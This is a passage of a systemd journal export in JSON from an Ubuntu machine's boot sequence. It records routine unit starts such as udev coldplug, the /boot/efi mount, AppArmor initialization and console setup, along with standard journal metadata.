"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started udev Coldplug all Devices.", "UNIT" : "systemd-udev-trigger.service", "INVOCATION_ID" : "880103d45fc6499fa0bf439eb2b31545", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280780124301" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ec;b=e2b08827b5804427b422c10c84f1567e;m=596db5;t=5bd16dd1ced1c;x=2ce32247415e65b0", "__REALTIME_TIMESTAMP" : "1615280780143900", "__MONOTONIC_TIMESTAMP" : "5860789", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Set the console keyboard layout.", "UNIT" : "keyboard-setup.service", "INVOCATION_ID" : "88391c49fb4a4866b11a14cff32627b9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780141400" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ed;b=e2b08827b5804427b422c10c84f1567e;m=598031;t=5bd16dd1cff98;x=288e5cb33d396f96", "__REALTIME_TIMESTAMP" : "1615280780148632", "__MONOTONIC_TIMESTAMP" : "5865521", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : 
"job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Dispatch Password Requests to Console Directory Watch.", "UNIT" : "systemd-ask-password-console.path", "INVOCATION_ID" : "5b12b92bcd6f4700a8056df2d51f2500", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780145529" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ee;b=e2b08827b5804427b422c10c84f1567e;m=599744;t=5bd16dd1d16ac;x=743f8dae205b830a", "__REALTIME_TIMESTAMP" : "1615280780154540", "__MONOTONIC_TIMESTAMP" : "5871428", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local Encrypted Volumes.", "UNIT" : "cryptsetup.target", "INVOCATION_ID" : "e167c4ac112d4163b1132569ae1999dc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780151879" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ef;b=e2b08827b5804427b422c10c84f1567e;m=59b0da;t=5bd16dd1d3041;x=3b7b8b0d01bd86dd", "__REALTIME_TIMESTAMP" : "1615280780161089", "__MONOTONIC_TIMESTAMP" : "5877978", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", 
"_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local File Systems (Pre).", "UNIT" : "local-fs-pre.target", "INVOCATION_ID" : "8775097a2b9d438eb78e2d0195363732", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780158334" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f0;b=e2b08827b5804427b422c10c84f1567e;m=5f3294;t=5bd16dd22b1fc;x=9bd3cb671a6f47b3", "__REALTIME_TIMESTAMP" : "1615280780521980", "__MONOTONIC_TIMESTAMP" : "6238868", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "CODE_FILE" : "../src/udev/net/ethtool-util.c", "CODE_LINE" : "547", "CODE_FUNC" : "ethtool_set_glinksettings", "SYSLOG_IDENTIFIER" : "systemd-udevd", "MESSAGE" : "link_config: autonegotiation is unset or enabled, the speed and duplex are not writable.", "_PID" : "409", "_COMM" : "systemd-udevd", "_EXE" : "/lib/systemd/systemd-udevd", "_CMDLINE" : "/lib/systemd/systemd-udevd", "_SYSTEMD_CGROUP" : "/system.slice/systemd-udevd.service", "_SYSTEMD_UNIT" : "systemd-udevd.service", "_SYSTEMD_INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780521851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f1;b=e2b08827b5804427b422c10c84f1567e;m=60e5fe;t=5bd16dd246565;x=70999a101e00351a", "__REALTIME_TIMESTAMP" : "1615280780633445", "__MONOTONIC_TIMESTAMP" : "6350334", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Found device /dev/ttyS0.", "UNIT" : "dev-ttyS0.device", "INVOCATION_ID" : "293ed7c0e80948c39b31c3279654da1d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780631229" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f2;b=e2b08827b5804427b422c10c84f1567e;m=621e23;t=5bd16dd259d8a;x=648886d4bbc9a161", "__REALTIME_TIMESTAMP" : "1615280780713354", "__MONOTONIC_TIMESTAMP" : "6430243", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch.", "UNIT" : "systemd-rfkill.socket", "INVOCATION_ID" : "3484c3c7a8ea4120a1c191923754f101", "_SOURCE_REALTIME_TIMESTAMP" : 
"1615280780709645" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f3;b=e2b08827b5804427b422c10c84f1567e;m=62289e;t=5bd16dd25a806;x=f8d08e8ec74b004e", "__REALTIME_TIMESTAMP" : "1615280780716038", "__MONOTONIC_TIMESTAMP" : "6432926", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "CODE_FILE" : "../src/udev/net/ethtool-util.c", "CODE_LINE" : "547", "CODE_FUNC" : "ethtool_set_glinksettings", "SYSLOG_IDENTIFIER" : "systemd-udevd", "MESSAGE" : "link_config: autonegotiation is unset or enabled, the speed and duplex are not writable.", "_COMM" : "systemd-udevd", "_EXE" : "/lib/systemd/systemd-udevd", "_CMDLINE" : "/lib/systemd/systemd-udevd", "_SYSTEMD_CGROUP" : "/system.slice/systemd-udevd.service", "_SYSTEMD_UNIT" : "systemd-udevd.service", "_SYSTEMD_INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "_PID" : "411", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780716029" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f4;b=e2b08827b5804427b422c10c84f1567e;m=67191c;t=5bd16dd2a9882;x=f359e2cba0ff9606", "__REALTIME_TIMESTAMP" : "1615280781039746", "__MONOTONIC_TIMESTAMP" : "6756636", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", 
"JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Found device /dev/disk/by-label/UEFI.", "UNIT" : "dev-disk-by-label-UEFI.device", "INVOCATION_ID" : "5c43576c87dc4326a86b3081ce645102", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781038616" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f5;b=e2b08827b5804427b422c10c84f1567e;m=67369d;t=5bd16dd2ab604;x=7e47c4b15c12240b", "__REALTIME_TIMESTAMP" : "1615280781047300", "__MONOTONIC_TIMESTAMP" : "6764189", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Mounting /boot/efi...", "UNIT" : "boot-efi.mount", "INVOCATION_ID" : "6a4e024c144a4cccb32d6a9dbf13382f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781046777" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f6;b=e2b08827b5804427b422c10c84f1567e;m=6803fa;t=5bd16dd2b8361;x=d5c232e837e738ae", "__REALTIME_TIMESTAMP" : "1615280781099873", "__MONOTONIC_TIMESTAMP" : "6816762", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : 
"3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "boot-efi.mount", "INVOCATION_ID" : "6a4e024c144a4cccb32d6a9dbf13382f", "MESSAGE" : "Mounted /boot/efi.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781095873" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f7;b=e2b08827b5804427b422c10c84f1567e;m=6804df;t=5bd16dd2b8446;x=37eb2db56a93c4b0", "__REALTIME_TIMESTAMP" : "1615280781100102", "__MONOTONIC_TIMESTAMP" : "6816991", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local File Systems.", "UNIT" : "local-fs.target", "INVOCATION_ID" : "1dacf109c01042b8b9e02d10371c1b1c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781098003" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f8;b=e2b08827b5804427b422c10c84f1567e;m=680a8c;t=5bd16dd2b89f3;x=4910c4745d1d7773", "__REALTIME_TIMESTAMP" : "1615280781101555", "__MONOTONIC_TIMESTAMP" : "6818444", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : 
"systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Create Volatile Files and Directories...", "UNIT" : "systemd-tmpfiles-setup.service", "INVOCATION_ID" : "5e70a567d5ea41bca036432fe845e916", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781101547" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f9;b=e2b08827b5804427b422c10c84f1567e;m=682f82;t=5bd16dd2baee9;x=b533bcff03066bd8", "__REALTIME_TIMESTAMP" : "1615280781111017", "__MONOTONIC_TIMESTAMP" : "6827906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Tell Plymouth To Write Out Runtime Data...", "UNIT" : "plymouth-read-write.service", "INVOCATION_ID" : "bb9896e20e1245a5accc30ae97de9802", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781108890" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fa;b=e2b08827b5804427b422c10c84f1567e;m=684d79;t=5bd16dd2bcce0;x=39cd496056218fc", "__REALTIME_TIMESTAMP" : 
"1615280781118688", "__MONOTONIC_TIMESTAMP" : "6835577", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Set console font and keymap...", "UNIT" : "console-setup.service", "INVOCATION_ID" : "d076bfd203c341b0aa9ae47eee197dc7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781116825" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fb;b=e2b08827b5804427b422c10c84f1567e;m=686e85;t=5bd16dd2beded;x=c38475369e87d84a", "__REALTIME_TIMESTAMP" : "1615280781127149", "__MONOTONIC_TIMESTAMP" : "6844037", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting ebtables ruleset management...", "UNIT" : "ebtables.service", "INVOCATION_ID" : "ca659a18573443f4b7253369397d23c9", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280781125009" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fc;b=e2b08827b5804427b422c10c84f1567e;m=6887aa;t=5bd16dd2c0711;x=3a5b6560f5f3420d", "__REALTIME_TIMESTAMP" : "1615280781133585", "__MONOTONIC_TIMESTAMP" : "6850474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting AppArmor initialization...", "UNIT" : "apparmor.service", "INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781131338" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fd;b=e2b08827b5804427b422c10c84f1567e;m=68a7dd;t=5bd16dd2c2744;x=c4a43ea0df13bba7", "__REALTIME_TIMESTAMP" : "1615280781141828", "__MONOTONIC_TIMESTAMP" : "6858717", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", 
"_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Commit a transient machine-id on disk...", "UNIT" : "systemd-machine-id-commit.service", "INVOCATION_ID" : "a7cc3d2edc2d455f8262a9365ac0e1e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781139336" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fe;b=e2b08827b5804427b422c10c84f1567e;m=68e4be;t=5bd16dd2c6425;x=7b9454eaca1e6031", "__REALTIME_TIMESTAMP" : "1615280781157413", "__MONOTONIC_TIMESTAMP" : "6874302", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "console-setup.service", "INVOCATION_ID" : "d076bfd203c341b0aa9ae47eee197dc7", "MESSAGE" : "Started Set console font and keymap.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781154519" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ff;b=e2b08827b5804427b422c10c84f1567e;m=692751;t=5bd16dd2ca6b9;x=a0284d33fd2653c0", "__REALTIME_TIMESTAMP" : "1615280781174457", "__MONOTONIC_TIMESTAMP" : "6891345", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : 
